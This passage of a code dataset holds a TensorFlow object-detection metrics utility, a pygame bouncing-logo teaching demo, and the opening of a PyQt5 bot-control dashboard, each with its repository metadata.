mean_iou = tf.reduce_mean(mean_ious.stack())\n\n # Stack the score_maxf1 values. The returned tensor will have two columns, the first will hold the classes\n # for which scores_maxf1 is non-zero, and the second will hold the scores_maxf1 value for that class.\n scores_maxf1 = scores_maxf1.stack()\n\n mean_average_precision = tf.reduce_mean(average_precisions.stack())\n\n return mean_average_precision, mean_iou, scores_maxf1\n\n\n@tf.function()\ndef compute_map_iou_per_batch(gt_boxes_tensors, gt_one_hot_labels_tensors, detections, batch_size,\n iou_threshold=0.5, n_scores=100, num_classes=1):\n # initialize tensor array for aggregating mAP values for each image in the batch:\n mean_average_precisions_batch = \\\n tf.TensorArray(tf.float32, size=batch_size, dynamic_size=False, clear_after_read=True)\n mean_iou_batch = \\\n tf.TensorArray(tf.float32, size=batch_size, dynamic_size=False, clear_after_read=True)\n scores_maxf1_batch = \\\n tf.TensorArray(tf.float32, size=0, dynamic_size=True, clear_after_read=True, infer_shape=False)\n scores_maxf1 = \\\n tf.TensorArray(tf.float32, size=num_classes, dynamic_size=False, clear_after_read=True)\n\n for ii in range(batch_size):\n # invert one-hot encodings back to 'dense' labels:\n gt_labels_tensor = tf.cast(tf.argmax(gt_one_hot_labels_tensors[ii], axis=1), dtype='int32')\n gt_boxes_tensor = gt_boxes_tensors[ii]\n\n # unpack the predicted classes and boxes from the `detections` dictionary:\n pred_labels_tensor = tf.cast(detections['detection_classes'][ii], dtype='int32')\n pred_boxes_tensor = detections['detection_boxes'][ii]\n pred_boxes_scores = detections['detection_scores'][ii]\n\n # ------------------------------------------------------------------------------\n\n mean_average_precision, mean_iou, scores_maxf1_img = \\\n compute_map_iou_per_image(gt_boxes_tensor, gt_labels_tensor,\n pred_boxes_tensor, pred_labels_tensor, pred_boxes_scores,\n iou_threshold=iou_threshold, n_scores=n_scores)\n\n mean_average_precisions_batch = mean_average_precisions_batch.write(ii, mean_average_precision)\n mean_iou_batch = mean_iou_batch.write(ii, mean_iou)\n scores_maxf1_batch = scores_maxf1_batch.write(ii, scores_maxf1_img)\n\n map_batch = tf.reduce_mean(mean_average_precisions_batch.stack())\n mean_iou_batch = tf.reduce_mean(mean_iou_batch.stack())\n\n scores_maxf1_all = scores_maxf1_batch.concat()\n # Loop through the classes and determine the mean score_maxf1. 
If there were no detections for that class\n # in this batch, the score_maxf1 for it will be nan.\n for i_class in tf.range(num_classes):\n # mask = tf.equal(scores_maxf1_all[:, 0], tf.cast(i_class, tf.float32))\n # if tf.not_equal(tf.size(mask), 0):\n # scores_maxf1_class = tf.boolean_mask(scores_maxf1_all[:, 1], mask, axis=0)\n\n index_class = tf.where(tf.equal(scores_maxf1_all[:, 0], tf.cast(i_class, tf.float32)))\n scores_maxf1_class = tf.gather(scores_maxf1_all[:, 1], index_class)\n scores_maxf1 = scores_maxf1.write(i_class, tf.reduce_mean(scores_maxf1_class))\n\n scores_maxf1 = scores_maxf1.stack()\n\n return map_batch, mean_iou_batch, scores_maxf1\n\n\ndef get_datagen(image_path_list, gt_boxes_list, gt_labels_list, num_classes, label_id_offset):\n \"\"\"\n Returns a data generator for feeding a tensorflow.Dataset object.\n\n :param image_path_list: array-like\n List of the image files.\n :param gt_boxes_list: list of numpy.ndarray\n List of bounding box arrays corresponding to the images in `image_path_list`.\n Each array has a shape of (n_boxes, 4) where the 4 columns contain the (ymin, xmin, ymax, xmax) values in\n relative coordinates in [0,1].\n :param gt_labels_list: list of numpy.ndarray\n List of classification label arrays.\n :param num_classes: int\n The total number of ground truth classes.\n :param label_id_offset: int\n The offset of label id's with respect to a labelling scheme that starts with 0.\n :return: generator function\n \"\"\"\n\n def datagen():\n for (image_path, gt_boxes_np, gt_labels_np) in zip(image_path_list, gt_boxes_list, gt_labels_list):\n # # Load next image into PIL format:\n # image_pil = tf.keras.utils.load_img(image_path)\n # # Convert the image into a numpy array:\n # image_np = tf.keras.preprocessing.image.img_to_array(image_pil, dtype='uint8')\n # # Convert the image array into tensor and add a batch dimension:\n # image_tensor = tf.expand_dims(tf.convert_to_tensor(image_np, dtype=tf.float32), axis=0)\n\n image = tf.io.read_file(image_path)\n image_tensor = tf.io.decode_image(image, channels=3, dtype=tf.uint8)\n image_shape = tf.convert_to_tensor(image_tensor.shape, dtype=tf.int32)\n image_tensor = tf.cast(image_tensor, dtype=tf.float32)\n\n # Run the image tensor through the model's preprocessing method\n # this requires a batch dimension:\n # image_tensor = tf.expand_dims(image_tensor, axis=0)\n # image_tensor = tf.squeeze(model.preprocess(image_tensor)[0], axis=0)\n image_tensor = tf.RaggedTensor.from_tensor(image_tensor, row_splits_dtype=tf.int32)\n\n # Convert the groundtruth boxes from numpy array into tensor:\n gt_boxes_tensor = tf.convert_to_tensor(gt_boxes_np, dtype=tf.float32)\n gt_boxes_rtensor = tf.RaggedTensor.from_tensor(gt_boxes_tensor, row_splits_dtype=tf.int32)\n\n # Offset the groundtruth labels to start from 0,\n # convert the labels numpy array into tensor,\n # and change the labels into one-hot representation:\n zero_indexed_groundtruth_classes = tf.convert_to_tensor(gt_labels_np - label_id_offset)\n val_gt_one_hot_labels_tensor = tf.one_hot(zero_indexed_groundtruth_classes, num_classes)\n val_gt_one_hot_labels_rtensor = tf.RaggedTensor.from_tensor(val_gt_one_hot_labels_tensor,\n row_splits_dtype=tf.int32)\n\n yield image_tensor, image_shape, gt_boxes_rtensor, val_gt_one_hot_labels_rtensor\n\n return datagen\n", "repo_name": "idekany/TuneRetinaNet", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 38912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 
"github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 152, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.GFile", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 167, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 168, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 168, "usage_type": "name"}, {"api_name": "six.BytesIO", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 171, "usage_type": "attribute"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 199, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 261, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 279, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 280, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 285, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 285, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 295, "usage_type": "call"}, {"api_name": 
"tensorflow.argmax", "line_number": 296, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 302, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 310, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 313, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 347, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 363, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 364, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 364, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 368, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 368, "usage_type": "name"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 372, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 372, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 387, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 387, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 390, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 421, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 444, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 444, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 448, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 448, "usage_type": "name"}, {"api_name": "numpy.ones_like", "line_number": 451, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 464, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 464, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 466, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 466, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 472, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 498, "usage_type": "call"}, 
{"api_name": "numpy.pi", "line_number": 498, "usage_type": "attribute"}, {"api_name": "tensorflow.atan", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 505, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 505, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 506, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 506, "usage_type": "call"}, {"api_name": "tensorflow.atan", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 514, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 514, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 515, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 515, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 518, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 518, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 519, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 519, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 528, "usage_type": "call"}, {"api_name": "matplotlib.patches.Ellipse", "line_number": 538, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 538, "usage_type": "attribute"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 552, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 567, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 570, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 571, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 573, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 574, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 581, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 582, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 589, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 590, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 608, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 610, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 611, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 613, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 613, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 614, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 614, "usage_type": "call"}, {"api_name": "tensorflow.minimum", "line_number": 615, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 615, "usage_type": "call"}, {"api_name": "tensorflow.minimum", "line_number": 616, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 616, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 618, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 622, "usage_type": "call"}, {"api_name": 
"tensorflow.function", "line_number": 595, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 653, "usage_type": "call"}, {"api_name": "tensorflow.unique", "line_number": 655, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 656, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 659, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 659, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 660, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 660, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 661, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 661, "usage_type": "attribute"}, {"api_name": "tensorflow.range", "line_number": 664, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 669, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 669, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 670, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 670, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 671, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 671, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 672, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 672, "usage_type": "attribute"}, {"api_name": "tensorflow.squeeze", "line_number": 676, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 676, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 677, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 679, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 679, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 682, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 685, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 687, "usage_type": "call"}, {"api_name": "tensorflow.linspace", "line_number": 687, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 695, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 700, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 700, "usage_type": "call"}, {"api_name": "tensorflow.logical_and", "line_number": 701, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 701, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 702, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 704, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 709, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 709, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 713, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 713, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 714, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 714, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 719, 
"usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 719, "usage_type": "call"}, {"api_name": "tensorflow.logical_not", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 725, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 725, "usage_type": "call"}, {"api_name": "tensorflow.logical_not", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 730, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 730, "usage_type": "call"}, {"api_name": "tensorflow.boolean_mask", "line_number": 732, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 755, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.experimental.numpy.diff", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.experimental", "line_number": 759, "usage_type": "attribute"}, {"api_name": "tensorflow.argmax", "line_number": 764, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 765, "usage_type": "call"}, {"api_name": "tensorflow.greater", "line_number": 767, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 768, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 768, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 768, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 770, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 776, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 627, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 786, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 786, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 788, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 788, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 790, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 790, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 792, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 792, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 796, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 796, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 800, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 815, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 816, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 821, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 826, 
"usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 826, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 826, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 826, "usage_type": "attribute"}, {"api_name": "tensorflow.gather", "line_number": 827, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 828, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 781, "usage_type": "call"}, {"api_name": "tensorflow.io.read_file", "line_number": 863, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 863, "usage_type": "attribute"}, {"api_name": "tensorflow.io.decode_image", "line_number": 864, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 864, "usage_type": "attribute"}, {"api_name": "tensorflow.uint8", "line_number": 864, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 865, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 865, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 866, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 866, "usage_type": "attribute"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 872, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 872, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 872, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 875, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 875, "usage_type": "attribute"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 876, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 876, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 876, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 881, "usage_type": "call"}, {"api_name": "tensorflow.one_hot", "line_number": 882, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 883, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 883, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 884, "usage_type": "attribute"}]}
+{"seq_id": "23674110279", "text": "'''\nCS 150 Introduction to OOP\n\nDemos a bouncing photo\n'''\nimport pygame\n\n# Specify the width and height of the screen for the game\nSCREEN_WIDTH = 1080\nSCREEN_HEIGHT = 720\n\n# Photo to display\nPHOTO = 'DVD.png' # 'red_logo.png'\n\n# Frames-Per-Second for game updates\nFPS = 60\n\nclass Box():\n def __init__(self):\n self.rect = pygame.Rect(0, 180, 320, 191)\n self.velocity = [200,200]\n img = pygame.image.load(PHOTO)\n self.image = pygame.transform.scale(img, self.rect.size)\n \n def update(self,dt):\n self.rect.x += self.velocity[0]*dt\n self.rect.y += self.velocity[1]*dt\n \n # Use the relevant attributes to check if rectangle has hit the edges\n # of the screen (0,0 is the upper left corner)\n if (self.rect.left < 0 or self.rect.right > SCREEN_WIDTH):\n self.velocity[0] *= -1\n if (self.rect.top < 0 or self.rect.bottom > SCREEN_HEIGHT):\n self.velocity[1] *= -1\n \n def render(self, display):\n # Show the bouncing object at the current location\n display.blit(self.image, self.rect)\n\ndef play_game():\n # Initialize pygame\n pygame.init()\n pygame.font.init()\n\n # Initialize the screen\n screen = pygame.display.set_mode( (SCREEN_WIDTH,SCREEN_HEIGHT) )\n\n # Initialize game elements\n box = Box()\n\n # Initialize some game variables\n time = 0\n delta_t = 1/FPS\n\n # Setup the font and clock\n font = pygame.font.SysFont('Arial',14)\n clock = pygame.time.Clock()\n\n # Main game loop\n while True:\n \n # Get the event corresponding to user input\n event = pygame.event.poll()\n if event.type == pygame.QUIT:\n break\n\n # Draw the scene\n screen.fill((255,255,255)) # Fill the scene with white (specified by RGB tuple)\n\n box.update(delta_t) # Update the position of the box\n box.render(screen) # Show the bouncing object\n\n # Update and draw the current time in the bottom left corner\n time += delta_t\n text = font.render('Time=' + str(round(time,1)) + ' seconds',True,(0,0,0))\n screen.blit(text,(10,0.95*SCREEN_HEIGHT))\n\n # Update the screen\n pygame.display.update()\n clock.tick(FPS)\n\n pygame.quit()\n\n\n", "repo_name": "Norvoke/middcs150", "sub_path": "Week 11/logo_pygame.py", "file_name": "logo_pygame.py", "file_ext": "py", "file_size_in_byte": 2270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.Rect", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.font.init", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.event.poll", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 63, 
"usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "72764017769", "text": "import io\nimport json\nimport logging\nimport os\nimport sys\nimport time\n\nimport dotenv\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom PyQt5 import QtGui, QtCore\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal, QObject\nfrom PyQt5.QtGui import QImage, QPixmap, QFontDatabase, QFont\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5.uic import loadUi\n\nfrom requesters import GetRequester, PostRequester, Vars\nimport resources\n\nCHART_WIDTH = 320\n\n\nclass GetHandler(QObject):\n done = pyqtSignal(object)\n getter = GetRequester(os.environ.get('APPLICATION_URL'))\n\n def loop(self):\n while True:\n response = self.getter.response\n self.done.emit(response)\n\n time.sleep(0.3)\n\n\nclass PostHandler(QObject):\n done = pyqtSignal(object)\n poster = PostRequester(os.environ.get('APPLICATION_URL'))\n\n def post(self, instruction):\n res = self.poster.post(instruction)\n if not res.ok:\n pass\n\n self.done.emit(res.status_code)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n loadUi('main.ui', self)\n\n self._logger = logging.getLogger('index')\n self.pageList = ['homePage', 'logsPage']\n\n self.initUi()\n\n self._thread = QThread()\n\n self.get_handler = GetHandler()\n self.get_handler.done.connect(self.onRequestReady)\n\n self.post_handler = PostHandler()\n\n self.post_handler.moveToThread(self._thread)\n self.get_handler.moveToThread(self._thread)\n\n self._thread.started.connect(self.get_handler.loop)\n\n self.latency_log = [-2 for _ in range(10)]\n self.memory_usage_log = [-2 for _ in range(10)]\n\n self._thread.start()\n\n def closeEvent(self, event: QtGui.QCloseEvent) -> None:\n self._logger.info('Closing MainWindow')\n super().closeEvent(event)\n self._logger.info('MainWindow has been successfully closed')\n\n def initUi(self):\n self._logger.info('Initializing MainWindow\\'s UI')\n\n # Navigation\n for i in ['home', 'logs']:\n eval(f'self.{i}').clicked.connect(self.onNavChecked)\n\n # Bot controls\n for i in ['launch', 'terminate', 'restart']:\n 